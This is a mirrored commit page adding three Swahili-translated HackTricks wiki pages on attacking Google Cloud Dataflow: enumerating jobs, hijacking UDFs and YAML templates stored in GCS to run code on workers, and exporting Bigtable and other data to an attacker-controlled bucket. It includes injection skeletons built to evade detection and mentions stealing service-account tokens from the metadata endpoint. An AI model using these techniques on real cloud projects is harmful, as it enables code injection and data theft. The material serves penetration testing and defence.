gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-06-12 19:11:44 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp

Browse Source
This commit is contained in:
Translator
2026-02-16 11:12:16 +00:00
parent 6891481ded
commit c0f10fb841
3 changed files with 307 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
+53
View File
@@ -0,0 +1,53 @@
# GCP - Dataflow Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Dataflow
Kwa taarifa zaidi kuhusu Dataflow angalia:
{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}
### Kutumia Dataflow ku-exfiltrate data kutoka kwa huduma nyingine
**Ruhusa:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (kwa SA yenye ufikiaji kwa source na sink)
Ikiwa una haki za kuunda job za Dataflow, unaweza kutumia templates za GCP Dataflow ku-export data kutoka Bigtable, BigQuery, Pub/Sub, na huduma nyingine hadi GCS buckets zinazodhibitiwa na mshambulizi. Hii ni mbinu yenye nguvu ya post-exploitation wakati umetapata access ya Dataflow—kwa mfano kupitia [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).
> [!NOTE]
> Unahitaji `iam.serviceAccounts.actAs` kwa service account yenye ruhusa za kutosha za kusoma source na kuandika kwenye sink. Kwa chaguo-msingi, Compute Engine default SA inatumika ikiwa haibainishwi.
#### Bigtable to GCS
Angalia [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" kwa pattern kamili. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
<details>
<summary>Hamisha Bigtable kwenda bucket inayodhibitiwa na mshambulizi</summary>
```bash
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
--project=<PROJECT> \
--region=<REGION> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
--staging-location=gs://<YOUR_BUCKET>/staging/
```
</details>
#### BigQuery to GCS
Templates za Dataflow zipo za kuhamisha data ya BigQuery. Tumia template inayofaa kwa muundo unaolengwa (JSON, Avro, n.k.) na elekeza matokeo kwenye bucket yako.
#### Pub/Sub na vyanzo vya streaming
Pipelines za streaming zinaweza kusoma kutoka Pub/Sub (au vyanzo vingine) na kuandika kwa GCS. Anzisha job kwa kutumia template inayosoma kutoka kwenye subscription lengwa ya Pub/Sub na kuandika kwenye bucket unayodhibiti.
## Marejeleo
- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
{{#include ../../../banners/hacktricks-training.md}}
src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
+173
View File
@@ -0,0 +1,173 @@
# GCP - Dataflow Privilege Escalation
{{#include ../../../banners/hacktricks-training.md}}
## Dataflow
{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}
### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`
Dataflow haithamini uhalali wa UDFs na job template YAMLs zilizohifadhiwa katika GCS.
Kwa kuwa na ufikiaji wa kuandika kwenye bucket, unaweza kuandika tena faili hizi ili kuingiza code, kutekeleza code kwenye workers, kuiba service account tokens, au kubadilisha usindikaji wa data.
Pipelines za batch na streaming zote ni malengo yanayoweza kushambuliwa kwa njia hii. Ili kutekeleza shambulio kwenye pipeline tunahitaji kubadilisha UDFs/templates kabla job ianze, katika dakika chache za mwanzo (kabla workers wa job kuundwa) au wakati job inakimbia kabla workers wapya kuanzishwa (kutokana na autoscaling).
**Attack vectors:**
- **UDF hijacking:** Python (`.py`) na JS (`.js`) UDFs zinazotajwa na pipelines na kuhifadhiwa katika customer-managed buckets
- **Job template hijacking:** Custom YAML pipeline definitions zilizohifadhiwa katika customer-managed buckets
> [!WARNING]
> **Run-once-per-worker trick:** Dataflow UDFs na template callables zinaitwa **per row/line**. Bila uratibu, exfiltration au token theft itafanya kazi maelfu ya nyakati, ikasababisha noise, rate limiting, na kugunduliwa. Tumia muundo wa **file-based coordination**: angalia kama marker file (k.m. `/tmp/pwnd.txt`) ipo mwanzoni; ikiwa ipo, ruka malicious code; ikiwa haipo, endesha payload na unda file. Hii inahakikisha payload inaendeshwa **mara moja kwa worker**, sio kwa kila line.
#### Direct exploitation via gcloud CLI
1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
<details>
<summary>List jobs and describe to get template path, staging location, and UDF references</summary>
```bash
# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<PROJECT_ID>
# Describe a job to get template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
```
</details>
2. Pakua UDF ya asili au kiolezo cha kazi kutoka GCS:
<details>
<summary>Pakua faili la UDF au kiolezo la YAML kutoka bucket</summary>
```bash
# If job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
```
</details>
3. Hariri faili kwa lokali: weka payload hasidi (tazama Python UDF au vipande vya YAML hapa chini) na hakikisha muundo wa uratibu wa run-once unatumiwa.
4. Pakia tena ili kuandika juu ya faili ya asili:
<details>
<summary>Pakia tena UDF au template kwenye bucket</summary>
```bash
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
# Or for YAML
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
```
</details>
5. Subiri kazi ijayo ianze, au (kwa streaming) chochea autoscaling (kwa mfano: jaza input ya pipeline) ili workers wapya waanze na kupakua faili iliyobadilishwa.
#### Python UDF injection
Ikiwa unataka worker i-exfiltrate data kwa C2 server yako, tumia `urllib.request` na si `requests`.
`requests` haijasakinishwa kwenye classic Dataflow workers.
<details>
<summary>Malicious UDF with run-once coordination and metadata extraction</summary>
```python
import os
import json
import urllib.request
from datetime import datetime
def _malicious_func():
# File-based coordination: run once per worker.
coordination_file = "/tmp/pwnd.txt"
if os.path.exists(coordination_file):
return
# malicous code goes here
with open(coordination_file, "w", encoding="utf-8") as f:
f.write("done")
def transform(line):
# Malicous code entry point - runs per line but coordination ensures once per worker
try:
_malicious_func()
except Exception:
pass
# ... original UDF logic follows ...
```
</details>
#### Kuingizwa kwa YAML kwenye kiolezo la kazi
Ingiza hatua ya `MapToFields` yenye callable inayotumia faili la uratibu. Kwa pipelines zinazotegemea YAML zinazounga mkono `requests`, itumie ikiwa kiolezo kinatangaza `dependencies: [requests]`; vinginevyo pendelea `urllib.request`.
Ongeza hatua ya kusafisha (`drop: [malicious_step]`) ili pipeline iendelee kuandika data halali kwa lengo.
<details>
<summary>Hatua ya MapToFields yenye madhara na usafishaji katika pipeline YAML</summary>
```yaml
- name: MaliciousTransform
type: MapToFields
input: Transform
config:
language: python
fields:
malicious_step:
callable: |
def extract_and_return(row):
import os
import json
from datetime import datetime
coordination_file = "/tmp/pwnd.txt"
if os.path.exists(coordination_file):
return True
try:
import urllib.request
# malicious code goes here
with open(coordination_file, "w", encoding="utf-8") as f:
f.write("done")
except Exception:
pass
return True
append: true
- name: CleanupTransform
type: MapToFields
input: MaliciousTransform
config:
fields: {}
append: true
drop:
- malicious_step
```
</details>
### Ufikiaji wa Compute Engine kwa Dataflow Workers
**Ruhusa:** `compute.instances.osLogin` au `compute.instances.osAdminLogin` (na `iam.serviceAccounts.actAs` juu ya worker SA), au `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (na `iam.serviceAccounts.actAs`) kwa ajili ya urithi wa zamani wa injection ya SSH key
Dataflow workers huendeshwa kama VMs za Compute Engine. Ufikiaji kwa workers kupitia OS Login au SSH unakuwezesha kusoma SA tokens kutoka kwenye metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), kudhibiti/kuhariri data, au kuendesha arbitrary code.
For exploitation details, see:
- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
## Marejeo
- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
{{#include ../../../banners/hacktricks-training.md}}
src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md
+81
View File
@@ -0,0 +1,81 @@
# GCP - Dataflow Enum
{{#include ../../../banners/hacktricks-training.md}}
## Maelezo ya Msingi
**Google Cloud Dataflow** ni huduma iliyosimamiwa kikamilifu kwa ajili ya **usindikaji wa data kwa batch na streaming**. Inawawezesha mashirika kujenga mitiririko (pipelines) ambazo hubadilisha na kuchambua data kwa wingi, zikijumuisha na Cloud Storage, BigQuery, Pub/Sub, na Bigtable. Dataflow pipelines zinaendesha kwenye worker VMs ndani ya project yako; templates na User-Defined Functions (UDFs) mara nyingi huhifadhiwa kwenye GCS buckets. [Learn more](https://cloud.google.com/dataflow).
## Components
Pipeline ya Dataflow kawaida inajumuisha:
**Template:** Ufafanuzi za YAML au JSON (na code za Python/Java kwa flex templates) zilizohifadhiwa kwenye GCS ambazo zinafafanua muundo wa pipeline na hatua zake.
**Launcher (Flex Templates):** Instance fupi ya Compute Engine inaweza kutumika kwa uzinduzi wa Flex Template ili kuthibitisha template na kuandaa containers kabla ya job kuanza.
**Workers:** Compute Engine VMs zinazotekeleza kazi halisi za usindikaji wa data, zikivuta UDFs na maelekezo kutoka kwa template.
**Staging/Temp buckets:** GCS buckets zinazohifadhi data za muda za pipeline, artifacts za job, faili za UDF, metadata za flex template (`.json`).
## Jobs za Batch dhidi ya Streaming
Dataflow inaunga mkono njia mbili za utekelezaji:
**Batch jobs:** Husindika dataset iliyopangwa na yenye mipaka (kwa mfano log file, table export). Job inaendesha mara moja hadi kukamilika kisha inaisha. Workers huundwa kwa muda wa job na kuzimwa wakati imekamilika. Batch jobs kwa kawaida hutumika kwa ETL, uchambuzi wa kihistoria, au uhamishaji wa data uliopangwa.
**Streaming jobs:** Husindika data isiyo na mipaka, inayokuja kwa kuendelea (kwa mfano Pub/Sub messages, live sensor feeds). Job inaendelea hadi itakapositishwa kusimamishwa. Workers zinaweza kupanuka au kupungua; workers wapya wanaweza kuzaliwa kutokana na autoscaling, na watavuta vipengele vya pipeline (templates, UDFs) kutoka GCS wakati wa startup.
## Uorodheshaji
Kazi za Dataflow na rasilimali zinazohusiana zinaweza kuorodheshwa ili kukusanya service accounts, template paths, staging buckets, na maeneo ya UDF.
### Uorodheshaji wa Jobs
Ili kuorodhesha Jobs za Dataflow na kupata maelezo yao:
```bash
# List Dataflow jobs in the project
gcloud dataflow jobs list
# List Dataflow jobs (by region)
gcloud dataflow jobs list --region=<region>
# Describe job (includes service account, template GCS path, staging location, parameters)
gcloud dataflow jobs describe <job-id> --region=<region>
```
Maelezo ya job yanafunua template GCS path, staging location, na worker service account—muhimu kwa kutambua buckets zinazohifadhi vipengele vya pipeline.
### Uorodhesha Template na Bucket
Buckets zinazotajwa katika maelezo ya job zinaweza kuwa na flex templates, UDFs, au YAML pipeline definitions:
```bash
# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
gcloud storage ls gs://<bucket>/
# List objects recursively
gcloud storage ls gs://<bucket>/**
```
## Privilege Escalation
{{#ref}}
../gcp-privilege-escalation/gcp-dataflow-privesc.md
{{#endref}}
## Post Exploitation
{{#ref}}
../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
{{#endref}}
## Persistence
{{#ref}}
../gcp-persistence/gcp-dataflow-persistence.md
{{#endref}}
## Marejeleo
- [Dataflow overview](https://cloud.google.com/dataflow)
- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)
{{#include ../../../banners/hacktricks-training.md}}